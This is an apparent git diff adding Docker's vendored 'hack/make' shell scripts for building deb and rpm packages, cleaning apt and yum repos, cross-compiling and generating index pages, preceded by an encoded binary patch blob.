zmKjj)TBYNAM#;4KhbW!1^o+1Wr3&Yio^MKWsZX{s*$A?&$krw6Xv1H=-=w@>v^Qc& z2nc~~Km{F5Hkz!fMgemvE#6(pciZXi8S2VY-nmLI8N`gHY74y9 zCzW!4mh2_H=`7t-VS!Zb45j4hUb8ySwRCw3a6J%?Xb=C8YzZ@?i z`xyzzVfwYnh*m&IG+T(z$;4k&I1}#1?-|{FLt{=_dePGI$s=<9lC3wy#d!KL=OO33_%FYI_=g9!B}!p6ltcQzd#MQDkmVDMteRCODghzUXh?;4T5ow1&hq)L@Ko9NKlTO zX33=j649d{UslfthFa@?c^@DQ2!H?xfPnZ3+@dV*Buk5sbfR)-&$^X%O(GC0`cr8pj^Ji*80}w@JU`UAOHep3D9ct{L~C##Dizd+h;Gt!)y)Nb=ww-=9x^T;&Z*NHrkv#n}o;egb)A(BuGG;MO{`Yv{Q)j2BNMmhmX%lHX`D#tCRJl z^gLTYcugynd?Ard2HjXTVM8FP6G+fbHD3fnzg4;bgC52?^Y#6k4G;gq*a^puCjb>u zD7V{+Rhx~$5L?+Hocj^r{Z@I&X-x39E0rpXX}mhRA7Sy82m+!|EU~p(bblx|45HYY 
z9>RfuSPAfHRt5c5)(TQ%2xIC#JUiw%;>`6p%?IVCO5CgwC+i$Y0EStYht_Y-WXv%2-4+aF>kpORXq|;c37-t^( z`0in&TH(79Hr#g@1F->GkwH}IUy5|M&@mrlAr_K?H>nZevki6AbHykg8ch;YtJ_MA zsk`JCU08;iRHb zy24DBqWHML4FY0-9M|k5y~$YhNiRcC-7o)RqisiFK)@XcXtQaC6(8#mW2=J$=IcFt z{bFgi#FOs8TdHM%fEd@DT5Z?9&wN^=DBskK%ZOtTFh_u|>)>1H@|_UHGQ+B<{QCMW zrL9Vq7Ig`3t|Nd!bYs?E{8f(KyL*#%fwOruT&7krxv!UTtR8pF;XPT}o7MK$Fn_gz zC1>Zc6ZbRONwP5FC7}Co2X94-SvWX8AKK??RI8@qB`KYp**l010Wq!XPj?<=8R_*+ zovk^S(-)^?9{9y6Idv=as$Pl>t5=>?^nP@8{)N_%*Q8)4GX_1h3rZpj}Q=N)Y9zj$t*j|-=3&FX^$)gwLBKJ3Sy1Q7KrA) zJ$u>4pEt1U*RJUhDwRq$>5VC@dQkNTNVi>0W)uIogqFwyBCb8)qM`fFtk}D&3|JJ3 zJQ_3)r*V(J3{Lp9pMbprfOiCUvM6V3+;o4OVx0PDO(87w`+V&(55(h}B}>_t zi@tau9z2RR?b;O*5AN2!N&xFxEs!6=xR8MEQ-SogC%!09^kW?cE^@h+`T4&9@h|`p z&o2a|sJc)nCe!yY?c3mrcMs4UdUrQ!T74f=r(gm9j_rwT*N&Z!6uE4%L&wm0<*Ij0bcldEF0SHJ@y!rQTy?uTv>XJ2X zy1_{|UmMc2ye|u+nO3|hykY&%MdIOITDkNgd4oB6l`-5>y$FI}P; z(07ZB>B9N*?7itT*oJlMb=_N^d_0@+0d{VlEahEf7&zKbz_9V5q{cdoi|yzC6@A!z zvau76#YI3VuIz{?H$$5zvAMf9u+&t$KTgBD4io`2z|5QDZf4483T~m~`^jcYcIo0p z#;w8JCjkkd*;%Ei^#bEq0=kwjpIs&87Z+dOpV=!dhd7oDVskVBw{L+YXs6oAOsN`d z_kak`f_{mwow*TZ@O!jUkQ-mWhjVx>$*8X{ZDC9%CC9$;CQH)t7(X;OTDO#3YJ(l7 z73Ax;m5pp=_uHFkv^aM>0k>BXyO8mwh_}yTyW-FX=C6dh=`W6mOhj>#647QmD*U!IjITSgb|RB}Oh5fw>#SN#DwJ$VMD|0zMzrbSJa-W~y#gphBTw9lLb4sAyfEd0OZ1PF61a_inmHVc@9< z0(^Q^dX|3YLkW(On-$Zw) zSxkxHEK&m45X;hvnUi>(Wo1^h)O$((_^yk5_eFOwK1w~{4Yv~xUUWWR7gMe*xCxx&1p?w6u0_ZC z`R=tWEwx9{7j1KOClTQ-k=VNB+4Hr^GL7QVdCO_k-SySU+wAL8w^=q?9wpx}d~lq% zIOq#cZntw7pV#i|_aTYLt0jYg4`&g8fH;e6QSr{-t6>=#Nh~MZvgt-e#ZiQt+*`wB zUg{#Qh`@=uN)$3hhFq!MDpx39q88X=IoTP1(xa`|Wq`gUBrPlYv)Ta~7C?(VcuRwS z5MTB}(`j9d^BPB;mn_xH3T3auHjrbmASirqGjs63Om|=ru&$P zAHCSSa@jg{CCO#-TxwlhlgpLcWD1>N+$*UxszrMpLy$K3RnL;tmQEjVw1WM!miNO>HVMURWfod?E? 
zs!WaMI#X-HNIb3=bs28bB!F31w$|H%ePJ}M_h))Ady%F2t6CM)<|}9(tDMg5ezKN0 zE~1;oN&ggdIdOHML}j@$nLJY_m*1n~n@lc0M8|6~UJfgIuUs3-?!EM2hup064f!&y zNC$0fD3l9>=r*h3Gpe!+^$NN$2LdGJ>l-MU1eHX zGPNR(()BYmE^);uj8hN2mmY}C&&f{6%ge2zmGdDI7^?_S>yLL+vRq|-0QpA8LE{$FSruPU_yz2qMrxz1K!DAA(Y&}-SPo$3T@2y-vOEb+A)e9tr9MMcLRX*8N!wEa&6&9uTzBk~)-UI8im zq!4*wkv-c9Y(IbXi5)jHMyX`7j+K0r)hl_cyvup3WZoneCG|;F^3|}&ioR_3jWpXc z;Lag+T~ss$m(Qk>@`pGaQAfVMTbN4Sg$Bz#R6QL5Q95y83`9D0^+-s?x{RQjtGGL2F}6Q)X%iASO@Uwvd}g zpK#HjZ<**s!=2Y{SX#;a6P~_)6R68-wxvPfPj~|Mwm={t4ywc7PMr(P%+vlxkLfVJ zO-DwaR!gg{^K)q%ql{c_9=Y-1(_Ff)n?FU{deH1yS-y-$(&^!@n@LNLBsrgL%d^C% zRe961pC3`HK~9UimEN?vPbFt^H3bONC}rjSePtT8>n1~u+k2jEzwW`U5S?i7mIhh= zp?6(PI_L(Hax@yR8_dhA4Ru)^mvS*YG4Bu%5!E`0h|i6Ty!{ou6?I*eE&d%2UoS7_ z3L&{k-=65S$-}y}4c$|Gl{i`&g>P%#s`d5zmiDuHvG4_)NriyD0)p>>IIyPMJy9c_ z#G}!rwA@n;jMi*ad3kv(IW3Ldp%0CxXJ%4+#(A&B6?`;oKn>Gb$7Zu9$%|TI%2$Tx z)2Ctc?xpI!Bnj~_sY;bPmH7vBf_Rv4@vu{LVL73~sU@O5m7H_ri2zj{Cq!>HO8%`4 zwMxajsB4S=I@+YuTX@vQlkW8$4@1`!AJgEi3@3`PqwB*sz69-5<5MRd^QMQ7?^gO$ zXLlMccgW{DotRrhT>=4n-#VcpB>=YdGAW7TU{coKp=C6ow#H#^IQ|h14Jirl<5DRd zH|uWG#UwWApKJDJPq^@0HE7C|ZrT)A4r+G5SU^CnPGR0Y18KlxqXoX5Sx)H+e=#Y9D;@q9$y z8gqkI7LJ* z98?`jWe)T4na+ksOm|R>h(?42ARr>Fl;W~9WYghZ9V>gUuIQ~4QCpyrvpHgg& z2LUBP00JV3YI>N-*iDD(gqGGEu3uWix8s$(IdLzOjoEdX(W*(^_Y7$fWWiUl%=Xuj zXYQYigT8x7cO&b?Lh?|gS^#gKGfb`K!f{ZlML@o-BLD%hj+ZEWPfa|m&SLTtovQi< zi6TRGW@7Exdu+}jfx5En%sYY;0gWb!c0e3S!m$iIJc|GXM8fqQv-$9%-qn0##X2rx z4chnrxz2vQh<)F!VJ5g=l`5Tt<8AtA$1K6~f(!^k00JTicE=?ev-wEJ@N(*nHT~6& zTd3i<>{%RBE{$1C{QVL;d^^M9Fz_f40hKC?gkuiPl6W0k=L%E@B1skkB9e-*CmSE_ zJ?eEmOM9eq72n!shYsvX#06oKv-8-f9T(Z<)NB`|h9s;epd{h&_FBjk%JEpwVKqIs z3;+RfqiTJ5)8WaTD|x?5AMKFLEG<*~H`8<2=$#kYtqiO;Gi4*#xk{bJyfmNDEVeh; z$W~Z(FIYv0FJTCX`0B*29L?HutV~uu+aFocySiNw2^jc7N;Vs}>ms|Cg=dw3)xZbG z@6sZ`59mW3?+Ka@BraM45D?K;jeQv#y7kDIh_afG9`{pOw?y2&WE~dzTyhqhu=^53 z#9>4&jEMJvdU>6uPXoS5!hu;;7Gm>MZx9eSuKBO_pHTmolDoNWMeo)ch4gy0AR;cj zIr(P+y}WkN0>Du;9ru_EQ$|t}CIA7EaOGK=^_lyQH_9z<8>A6%M6wHUS8Tvk8kR{xQG(`&_*M)xvs#YF`m$ 
ztHi9_&B|qy_grD8Xw^E50|@ZehQ@0jZL9nS8y24EfEW>lhZ2B*cwoi9z30DiK|acN zAM;guNu~H1x%q6y-`CilYj{bvsm}P=hQ{kMZK1q`wttyHp96#%+XNDUj0r$MjA?k# zF@3N~w*5xtq-x&sw`vEdy`@lezWvo#$8NLlPTbLLg(ZbN3!X=f<_-;rucj`lX*9NR zMezI}18zkC0^(NHX^&Y`PA&gG`i^dC+hTBSs9jf6*!%mhv$P!AZ5O660p8M3 ztM8I%Y@%(CXHXZ_zlA;E3*VFU92ri|n?=8~rju;^GLG|f> zU1i4|y%oG60V)0JL_>3px~G0-O64pX3_l~K>?5zzB_LG+NzhJ}E_6xcocg!|cHheU zxQ4ItxvDoK$&ocb0O=|UVntQu~_QC&z`lzrSrDxp%qA0CY zRYVlIbOk`+_1eS$SIa<*{3A^_hDt zPyeMU5oOQ%tjOj0G?;ON`lbFPyPWI_7SjYPVyq{L5Kbfj0dXQ+ca55h$*Gjwc9+s~ z{#VUg(X6(=+MD;qi@}_|pT%a=7pnffBeA{VRjN$tjyg|Mrhcc7|NcmOiEI%APvijv z%n^Wqn4^Ph77-vpDZBetR=iTC9az;{5%id^N+qz6v`~7RNSIg#c3v2kXXoeFc}HP(B|nb%?lC(0VffF zfH(;(qAg6||NcBt>&U(AI6sA~bvcc^R%LHRDVpJ>a>X}!lc*K)_3=Awl1ThP?tik_rdbY43lV{U2nj$yL|7@Fl%;Wr$Eu!7&FSZ( zkTvsD%IXBFWR**)rtnuOWHeyUln!XX+@vp6@ulp)6elFS)xZa@WwKoQ z%_1R4qu={%?W61<00JOj2LT9(9qI5JlQm;Ye9|S-E1Oy@g z0TBp1k_7<}00F5JfPhH729bXd009sXhyVmcAn-^Q1V8`;q)q?=BJ~!3mK51f)&?0wVPqME*el1VBI_ z0uT^^z#~}@009t?IspiX)N2s=2LTWO0f7iWKm-DhWI+G~KtSpQARtn&LF69DM7j00JNY0)h~LfCz#ei3(33K|59WOdtm!AbkQ*5$V?dd5|BF?0XxIq8}K){U& zKtSBMa#1u8009tiCIJYDGwC935C8!XaAN`x5I3$|6b%GG00f*#00QDnx`-PDKmY{X zm;eOCjVl*L0|5{K0cR3`fH;#b;syZ_00B2900D91%0!3m zz>Nt&K-{=;Q8W+$0T6H|0SJgQ=^}0r009tiV*(HmH?CY14Fo^{1e{3#0^&@%h#Lez z00i8a00hL1D;Grr0T2KIXA*#bIFl~o1_2NN0XHT90deEXMbSV21VF%<1Rx;Jq>H#g z00cn5jR`0T6Iw0uT^4u3Qui1V8`;oJjxz;!L`T z+j;^C+NstDLI@B50l^4BMFc~Sgh2oVKtS3AARyANKja<+KmY^;BLD#r3_TJC0T2KI zX%m2eNW1=!dk_Et5D<(21Vk|ONEie_00g8>00JWI`a|wP00cllFai(|!O$aN5C8!X zkTwAbh_veuxd#Cd00F@WKtKdTkAy)01VBLA1Rx;Nu0P}+1V8`;1S0?e5ez*N1_2NN z0cjI}fJnRkkb4jS0T2+300cxZ^hg*4KmY`!O#lKS?fOIRK>!3mKrjLj5W&zRVGsZT z5Rf(j2#B=n54i^c5C8$e2tYstLyv?(00cll+5{jV(yl+`9t1!D1Oy`h0TB#65(WVf z00C(efPhH5{*ZeR00D^-nB6gcvqZCAINMN>!aQ&W0w4eaAYdT@2#AHC;0**o00cmw zFaZciVIDXG0T2KI5U`K{1jIs6@CE`P00JOTm;eN%Fb|x800@8p2v|q}0%9R3cmn|t z009svOaKB>m 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a + fi + + debSource="$(awk -F ': ' '$1 == "Source" { print $2; 
exit }' hack/make/.build-deb/control)" + debMaintainer="$(awk -F ': ' '$1 == "Maintainer" { print $2; exit }' hack/make/.build-deb/control)" + debDate="$(date --rfc-2822)" + + # if go-md2man is available, pre-generate the man pages + make manpages + + builderDir="contrib/builder/deb/${PACKAGE_ARCH}" + pkgs=( $(find "${builderDir}/"*/ -type d) ) + if [ ! -z "$DOCKER_BUILD_PKGS" ]; then + pkgs=() + for p in $DOCKER_BUILD_PKGS; do + pkgs+=( "$builderDir/$p" ) + done + fi + for dir in "${pkgs[@]}"; do + [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } + version="$(basename "$dir")" + suite="${version##*-}" + + image="dockercore/builder-deb:$version" + if ! docker inspect "$image" &> /dev/null; then + ( + # Add the APT_MIRROR args only if the consuming Dockerfile uses it + # Otherwise this will cause the build to fail + if [ "$(grep 'ARG APT_MIRROR=' $dir/Dockerfile)" ] && [ "$BUILD_APT_MIRROR" ]; then + DOCKER_BUILD_ARGS="$DOCKER_BUILD_ARGS $BUILD_APT_MIRROR" + fi + set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" + ) + fi + + mkdir -p "$DEST/$version" + cat > "$DEST/$version/Dockerfile.build" <<-EOF + FROM $image + WORKDIR /usr/src/docker + COPY . 
/usr/src/docker + ENV DOCKER_GITCOMMIT $GITCOMMIT + RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers \ + && ln -snf /usr/src/docker /go/src/github.com/docker/docker + EOF + + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + # Install runc, containerd, proxy and tini + RUN ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini + EOF + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + RUN cp -aL hack/make/.build-deb debian + RUN { echo '$debSource (${debVersion}-0~${version}) $suite; urgency=low'; echo; echo ' * Version: $VERSION'; echo; echo " -- $debMaintainer $debDate"; } > debian/changelog && cat >&2 debian/changelog + RUN dpkg-buildpackage -uc -us -I.git + EOF + tempImage="docker-temp/build-deb:$version" + ( set -x && docker build -t "$tempImage" -f "$DEST/$version/Dockerfile.build" . ) + docker run --rm "$tempImage" bash -c 'cd .. && tar -c *_*' | tar -xvC "$DEST/$version" + docker rmi "$tempImage" + done + + bundle .integration-daemon-stop +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary new file mode 100644 index 0000000000..2039be416f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary @@ -0,0 +1,11 @@ +#!/bin/bash +set -e + +rm -rf "$DEST" +DEST="$DEST/../test-integration-cli" + +if [ -z $DOCKER_INTEGRATION_TESTS_VERIFIED ]; then + source ${MAKEDIR}/.integration-test-helpers + ensure_test_dir integration-cli "$DEST/test.main" + export DOCKER_INTEGRATION_TESTS_VERIFIED=1 +fi diff --git a/vendor/github.com/docker/docker/hack/make/build-rpm b/vendor/github.com/docker/docker/hack/make/build-rpm new file mode 100644 index 0000000000..7fec059392 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/build-rpm @@ -0,0 +1,148 @@ +#!/bin/bash +set -e + +# subshell so that we can export PATH and TZ without 
breaking other things +( + export TZ=UTC # make sure our "date" variables are UTC-based + + source "$(dirname "$BASH_SOURCE")/.integration-daemon-start" + source "$(dirname "$BASH_SOURCE")/.detect-daemon-osarch" + + # TODO consider using frozen images for the dockercore/builder-rpm tags + + rpmName=docker-engine + rpmVersion="$VERSION" + rpmRelease=1 + + # rpmRelease versioning is as follows + # Docker 1.7.0: version=1.7.0, release=1 + # Docker 1.7.0-rc1: version=1.7.0, release=0.1.rc1 + # Docker 1.7.0-cs1: version=1.7.0.cs1, release=1 + # Docker 1.7.0-cs1-rc1: version=1.7.0.cs1, release=0.1.rc1 + # Docker 1.7.0-dev nightly: version=1.7.0, release=0.0.YYYYMMDD.HHMMSS.gitHASH + + # if we have a "-rc*" suffix, set appropriate release + if [[ "$rpmVersion" =~ .*-rc[0-9]+$ ]] ; then + rcVersion=${rpmVersion#*-rc} + rpmVersion=${rpmVersion%-rc*} + rpmRelease="0.${rcVersion}.rc${rcVersion}" + fi + + DOCKER_GITCOMMIT=$(git rev-parse --short HEAD) + if [ -n "$(git status --porcelain --untracked-files=no)" ]; then + DOCKER_GITCOMMIT="$DOCKER_GITCOMMIT-unsupported" + fi + + # if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better + if [[ "$rpmVersion" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + gitUnix="$(git log -1 --pretty='%at')" + gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')" + gitCommit="$(git log -1 --pretty='%h')" + gitVersion="${gitDate}.git${gitCommit}" + # gitVersion is now something like '20150128.112847.17e840a' + rpmVersion="${rpmVersion%-dev}" + rpmRelease="0.0.$gitVersion" + fi + + # Replace any other dashes with periods + rpmVersion="${rpmVersion/-/.}" + + rpmPackager="$(awk -F ': ' '$1 == "Packager" { print $2; exit }' hack/make/.build-rpm/${rpmName}.spec)" + rpmDate="$(date +'%a %b %d %Y')" + + # if go-md2man is available, pre-generate the man pages + make manpages + + # Convert the CHANGELOG.md file into RPM changelog format + VERSION_REGEX="^\W\W (.*) \((.*)\)$" + 
ENTRY_REGEX="^[-+*] (.*)$" + while read -r line || [[ -n "$line" ]]; do + if [ -z "$line" ]; then continue; fi + if [[ "$line" =~ $VERSION_REGEX ]]; then + echo >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog + echo "* `date -d ${BASH_REMATCH[2]} '+%a %b %d %Y'` ${rpmPackager} - ${BASH_REMATCH[1]}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog + fi + if [[ "$line" =~ $ENTRY_REGEX ]]; then + echo "- ${BASH_REMATCH[1]//\`}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog + fi + done < CHANGELOG.md + + builderDir="contrib/builder/rpm/${PACKAGE_ARCH}" + pkgs=( $(find "${builderDir}/"*/ -type d) ) + if [ ! -z "$DOCKER_BUILD_PKGS" ]; then + pkgs=() + for p in $DOCKER_BUILD_PKGS; do + pkgs+=( "$builderDir/$p" ) + done + fi + for dir in "${pkgs[@]}"; do + [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } + version="$(basename "$dir")" + suite="${version##*-}" + + image="dockercore/builder-rpm:$version" + if ! docker inspect "$image" &> /dev/null; then + ( set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" ) + fi + + mkdir -p "$DEST/$version" + cat > "$DEST/$version/Dockerfile.build" <<-EOF + FROM $image + COPY . 
/usr/src/${rpmName} + WORKDIR /usr/src/${rpmName} + RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers + EOF + + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + # Install runc, containerd, proxy and tini + RUN TMP_GOPATH="/go" ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini + EOF + if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + echo 'ENV DOCKER_EXPERIMENTAL 1' >> "$DEST/$version/Dockerfile.build" + fi + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + RUN mkdir -p /root/rpmbuild/SOURCES \ + && echo '%_topdir /root/rpmbuild' > /root/.rpmmacros + WORKDIR /root/rpmbuild + RUN ln -sfv /usr/src/${rpmName}/hack/make/.build-rpm SPECS + WORKDIR /root/rpmbuild/SPECS + RUN tar --exclude .git -r -C /usr/src -f /root/rpmbuild/SOURCES/${rpmName}.tar ${rpmName} + RUN tar --exclude .git -r -C /go/src/github.com/docker -f /root/rpmbuild/SOURCES/${rpmName}.tar containerd + RUN tar --exclude .git -r -C /go/src/github.com/docker/libnetwork/cmd -f /root/rpmbuild/SOURCES/${rpmName}.tar proxy + RUN tar --exclude .git -r -C /go/src/github.com/opencontainers -f /root/rpmbuild/SOURCES/${rpmName}.tar runc + RUN tar --exclude .git -r -C /go/ -f /root/rpmbuild/SOURCES/${rpmName}.tar tini + RUN gzip /root/rpmbuild/SOURCES/${rpmName}.tar + RUN { cat /usr/src/${rpmName}/contrib/builder/rpm/${PACKAGE_ARCH}/changelog; } >> ${rpmName}.spec && tail >&2 ${rpmName}.spec + RUN rpmbuild -ba \ + --define '_gitcommit $DOCKER_GITCOMMIT' \ + --define '_release $rpmRelease' \ + --define '_version $rpmVersion' \ + --define '_origversion $VERSION' \ + --define '_experimental ${DOCKER_EXPERIMENTAL:-0}' \ + ${rpmName}.spec + EOF + # selinux policy referencing systemd things won't work on non-systemd versions + # of centos or rhel, which we don't support anyways + if [ "${suite%.*}" -gt 6 ] && [[ "$version" != opensuse* ]]; then + selinuxDir="selinux" + if [ -d "./contrib/selinux-$version" ]; then + 
selinuxDir="selinux-${version}" + fi + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + RUN tar -cz -C /usr/src/${rpmName}/contrib/${selinuxDir} -f /root/rpmbuild/SOURCES/${rpmName}-selinux.tar.gz ${rpmName}-selinux + RUN rpmbuild -ba \ + --define '_gitcommit $DOCKER_GITCOMMIT' \ + --define '_release $rpmRelease' \ + --define '_version $rpmVersion' \ + --define '_origversion $VERSION' \ + ${rpmName}-selinux.spec + EOF + fi + tempImage="docker-temp/build-rpm:$version" + ( set -x && docker build -t "$tempImage" -f $DEST/$version/Dockerfile.build . ) + docker run --rm "$tempImage" bash -c 'cd /root/rpmbuild && tar -c *RPMS' | tar -xvC "$DEST/$version" + docker rmi "$tempImage" + done + + source "$(dirname "$BASH_SOURCE")/.integration-daemon-stop" +) 2>&1 | tee -a $DEST/test.log diff --git a/vendor/github.com/docker/docker/hack/make/clean-apt-repo b/vendor/github.com/docker/docker/hack/make/clean-apt-repo new file mode 100755 index 0000000000..1c37d98e40 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/clean-apt-repo @@ -0,0 +1,43 @@ +#!/bin/bash +set -e + +# This script cleans the experimental pool for the apt repo. +# This is useful when there are a lot of old experimental debs and you only want to keep the most recent. 
+# + +: ${DOCKER_RELEASE_DIR:=$DEST} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo/pool/experimental +: ${DOCKER_ARCHIVE_DIR:=$DEST/archive} +DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" + +latest_versions=$(dpkg-scanpackages "$APTDIR" /dev/null 2>/dev/null | awk -F ': ' '$1 == "Filename" { print $2 }') + +# get the latest version +latest_docker_engine_file=$(echo "$latest_versions" | grep docker-engine) +latest_docker_engine_version=$(basename ${latest_docker_engine_file%~*}) + +echo "latest docker-engine version: $latest_docker_engine_version" + +# remove all the files that are not that version in experimental +pool_dir=$(dirname "$latest_docker_engine_file") +old_pkgs=( $(ls "$pool_dir" | grep -v "^${latest_docker_engine_version}" | grep "${latest_docker_engine_version%%~git*}") ) + +echo "${old_pkgs[@]}" + +mkdir -p "$DOCKER_ARCHIVE_DIR" +for old_pkg in "${old_pkgs[@]}"; do + echo "moving ${pool_dir}/${old_pkg} to $DOCKER_ARCHIVE_DIR" + mv "${pool_dir}/${old_pkg}" "$DOCKER_ARCHIVE_DIR" +done + +echo +echo "$pool_dir now has contents:" +ls "$pool_dir" + +# now regenerate release files for experimental +export COMPONENT=experimental +source "${DIR}/update-apt-repo" + +echo "You will now want to: " +echo " - re-sign the repo with hack/make/sign-repo" +echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/clean-yum-repo b/vendor/github.com/docker/docker/hack/make/clean-yum-repo new file mode 100755 index 0000000000..1cafbbd97f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/clean-yum-repo @@ -0,0 +1,20 @@ +#!/bin/bash +set -e + +# This script cleans the experimental pool for the yum repo. +# This is useful when there are a lot of old experimental rpms and you only want to keep the most recent. 
+# + +: ${DOCKER_RELEASE_DIR:=$DEST} +YUMDIR=$DOCKER_RELEASE_DIR/yum/repo/experimental + +suites=( $(find "$YUMDIR" -mindepth 1 -maxdepth 1 -type d) ) + +for suite in "${suites[@]}"; do + echo "cleanup in: $suite" + ( set -x; repomanage -k2 --old "$suite" | xargs rm -f ) +done + +echo "You will now want to: " +echo " - re-sign the repo with hack/make/sign-repo" +echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/cover b/vendor/github.com/docker/docker/hack/make/cover new file mode 100644 index 0000000000..08e28e3fea --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/cover @@ -0,0 +1,15 @@ +#!/bin/bash +set -e + +bundle_cover() { + coverprofiles=( "$DEST/../"*"/coverprofiles/"* ) + for p in "${coverprofiles[@]}"; do + echo + ( + set -x + go tool cover -func="$p" + ) + done +} + +bundle_cover 2>&1 | tee "$DEST/report.log" diff --git a/vendor/github.com/docker/docker/hack/make/cross b/vendor/github.com/docker/docker/hack/make/cross new file mode 100644 index 0000000000..6d672b17c3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/cross @@ -0,0 +1,46 @@ +#!/bin/bash +set -e + +# explicit list of os/arch combos that support being a daemon +declare -A daemonSupporting +daemonSupporting=( + [linux/amd64]=1 + [windows/amd64]=1 +) + +# if we have our linux/amd64 version compiled, let's symlink it in +if [ -x "$DEST/../binary-daemon/dockerd-$VERSION" ]; then + arch=$(go env GOHOSTARCH) + mkdir -p "$DEST/linux/${arch}" + ( + cd "$DEST/linux/${arch}" + ln -s ../../../binary-daemon/* ./ + ln -s ../../../binary-client/* ./ + ) + echo "Created symlinks:" "$DEST/linux/${arch}/"* +fi + +for platform in $DOCKER_CROSSPLATFORMS; do + ( + export KEEPDEST=1 + export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION + mkdir -p "$DEST" + ABS_DEST="$(cd "$DEST" && pwd -P)" + export GOOS=${platform%/*} + export GOARCH=${platform##*/} + + if [ "$GOOS" != "solaris" ]; 
then + # TODO. Solaris cannot be cross build because of CGO calls. + if [ -z "${daemonSupporting[$platform]}" ]; then + # we just need a simple client for these platforms + export LDFLAGS_STATIC_DOCKER="" + # remove the "daemon" build tag from platforms that aren't supported + export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) + source "${MAKEDIR}/binary-client" + else + source "${MAKEDIR}/binary-client" + source "${MAKEDIR}/binary-daemon" + fi + fi + ) +done diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary b/vendor/github.com/docker/docker/hack/make/dynbinary new file mode 100644 index 0000000000..1a435dc4bf --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/dynbinary @@ -0,0 +1,15 @@ +#!/bin/bash +set -e + +# This script exists as backwards compatibility for CI +( + DEST="${DEST}-client" + ABS_DEST="${ABS_DEST}-client" + . hack/make/dynbinary-client +) +( + + DEST="${DEST}-daemon" + ABS_DEST="${ABS_DEST}-daemon" + . hack/make/dynbinary-daemon +) diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-client b/vendor/github.com/docker/docker/hack/make/dynbinary-client new file mode 100644 index 0000000000..e4b7741848 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/dynbinary-client @@ -0,0 +1,12 @@ +#!/bin/bash +set -e + +( + export BINARY_SHORT_NAME='docker' + export GO_PACKAGE='github.com/docker/docker/cmd/docker' + export IAMSTATIC='false' + export LDFLAGS_STATIC_DOCKER='' + export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary + export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here + source "${MAKEDIR}/.binary" +) diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon new file mode 100644 index 0000000000..090a916f65 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon @@ -0,0 +1,12 @@ +#!/bin/bash +set -e 
+ +( + export BINARY_SHORT_NAME='dockerd' + export GO_PACKAGE='github.com/docker/docker/cmd/dockerd' + export IAMSTATIC='false' + export LDFLAGS_STATIC_DOCKER='' + export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary + export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here + source "${MAKEDIR}/.binary" +) diff --git a/vendor/github.com/docker/docker/hack/make/generate-index-listing b/vendor/github.com/docker/docker/hack/make/generate-index-listing new file mode 100755 index 0000000000..ec44171f81 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/generate-index-listing @@ -0,0 +1,74 @@ +#!/bin/bash +set -e + +# This script generates index files for the directory structure +# of the apt and yum repos + +: ${DOCKER_RELEASE_DIR:=$DEST} +APTDIR=$DOCKER_RELEASE_DIR/apt +YUMDIR=$DOCKER_RELEASE_DIR/yum + +if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then + echo >&2 'release-rpm or release-deb must be run before generate-index-listing' + exit 1 +fi + +create_index() { + local directory=$1 + local original=$2 + local cleaned=${directory#$original} + + # the index file to create + local index_file="${directory}/index" + + # cd into dir & touch the index file + cd $directory + touch $index_file + + # print the html header + cat <<-EOF > "$index_file" + + + Index of ${cleaned}/ + +

Index of ${cleaned}/


+
../
+	EOF
+
+	# start of content output
+	(
+	# change IFS locally within subshell so the for loop saves line correctly to L var
+	IFS=$'\n';
+
+	# pretty sweet, will mimic the normal apache output. skipping "index" and hidden files
